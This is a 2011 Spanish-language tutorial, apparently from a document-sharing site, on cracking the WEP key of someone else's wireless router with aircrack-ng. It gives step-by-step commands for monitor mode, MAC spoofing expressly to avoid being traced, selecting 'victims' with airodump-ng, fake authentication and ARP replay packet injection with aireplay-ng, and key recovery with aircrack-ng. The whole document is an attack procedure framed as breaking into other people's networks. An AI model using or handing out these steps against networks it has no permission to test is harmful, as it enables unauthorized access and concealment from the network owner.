Sunteți pe pagina 1din 4

BY z0kw3r! 2011. root.znfgre@gmail.

com

AIRCRACK
Bien... les explicare una forma de descifrar las claves WEP de un router
inalámbrico que utiliza obviamente este tipo de cifrados de clave.( Me
refiero a como hackear una red inalámbrica XD), para hacer esto hay
varias formas de hacerlo, explicare una de las más fáciles y efectivas

Bien para ello necesitamos tener la suite de Aircrack. Para tener


aircrack es muy fácil, en esta guía les enseñare como instalarla para las
distribuciones basadas en Debian, es tan simple como esto:
$ sudo aptitude install aircrack-ng
Y también necesitaremos esta:
$ sudo aptitude install macchanger
(mas adelante explicare para que es).
Teniendo instalado lo anterior seguiremos con la guía:

Primero:
1.- Abrir una Shell y escribir:
$ airmon-ng
//mostrara una lista de dispositivos inalámbricos, y vemos la interface
de nuestro dispositivo, ejemplo: wlan0

2.-Acontinuación pararemos el modo monitor existente


Escribimos:
$ airmon-ng stop <interface>
Ej: airmon-ng stop wlan0

//hemos deshabilitado el monitor

3.-Ahora pondremos la tarjeta en modo down, escribir:


$ ifconfig <interface> down
Ej: ifconfig wlan0 down

Bien el macchanger que instalamos anteriormente es para lo siguiente:

4.- Cambiar la mac, para que no sepan quien robo la clave y así nos
eviten futuras conexiones o simplemente con tu clave MAC real pueden
llegar hasta ti, saber quién eres:
Entonces teclear:
$ macchanger –m 00:11:22:33:44:55 <interface>
Ej: macchanger –m 00:11:22:33:44:55 wlan0

5.-Volver a activar el modo Monitor existente:


$ airmon-ng start <interface>
Ej: airmon-ng start wlan0

//ahora buscar victimas!!!


BY z0kw3r! 2011. root.znfgre@gmail.com

6.- En otra Terminal Escribir


$ airodump-ng wlan0

//cuando encontremos victimas paramos la búsqueda con ctrl+c y anotamos


los datos BSSID, CH, ESSDI

Lo que está debajo de PWR es el nivel de señal de la red inalámbrica, el


ESSID es el nombre de la red inalámbrica, el BSSID es el nombre de la
red, CH es el canal de la red y el DATA el Trafico de la red, esta
normalmente avanza lentamente.

Después de esta breve explicación continuamos.

7.- ahora escribimos:


$ airodump-ng –c <canal de la víctima> -w <nombre para guardar los
archivos ivs> <interface>
Ej: airodump-ng –c 6 –w pruebas wlan0

//los archivos IVS son archivos de la captura de la red, son importantes


para descifrar la clave WEP, para saber cuál es el canal es el número que
se muestra debajo del símbolo CH.

8.- Ahora que ya estas capturando datos veras que hay una parte que dice
DATA, estos son los paquetes que llevamos capturados, para poder
descifrar una wep es necesario 20,000 paquetes. Te darás cuenta que puede
ir muy lento, esto significa que ninguna persona está utilizando la red
entonces no está generando tráfico y te podría llevar días llegar a los
20,000 paquetes, pero no te preocupes que ahora te enseñare como generar
tráfico en la red.

Para inyectarle tráfico a la red abre otra terminal (consola) donde


introducirás los siguientes comandos:

$ aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0


BY z0kw3r! 2011. root.znfgre@gmail.com

Dónde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica

Luego cuando salgan 4 líneas de códigos y te diga que la conexión esta


successful, esto significa que estas conectado en capa 2 al router de la
red que estamos atacando.
Si por alguna razón no se puede conectar algunas de las razones son las
siguientes:
-La red a la que quieres atacar está muy lejos
-Tu tarjeta de red no puede hacer inyección de paquetes
-El router tiene seguridad para evitar este tipo de ataques

10.- Ahora para inyectarle el tráfico introduce el siguientes comando:


$ aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0

Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra
terminal donde estas capturando los paquetes te daras cuenta que la DATA
va caminando muy rápido.
Ahora abre otra terminal (consola) e introduce el siguiente comando:
$ aircrack-ng prueba-01.cap

Dónde:
Prueba-01.cap es el archivo donde se están capturando los datos.
//si nombraste tu archivo de una forma diferente deberás poner el nombre
de tu archivo por ejemplo:

Si nombraste el archivo “mi_captura” deberás colocar mi_captura-01.cap

Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!,
esto significa que la contraseña se ha descifrado, y te la mostrara al
lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o números de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalámbrica seria 1234567890.
BY z0kw3r! 2011. root.znfgre@gmail.com

Bien pues eso es todo, es solo una forma de crackear la clave WEP, es muy
largo el proceso. Después tratare de hacer otras guías de este mismo tema
pero más sencillas y tal vez haga algún video tutorial.

BY z0kw3r! 2011.

S-ar putea să vă placă și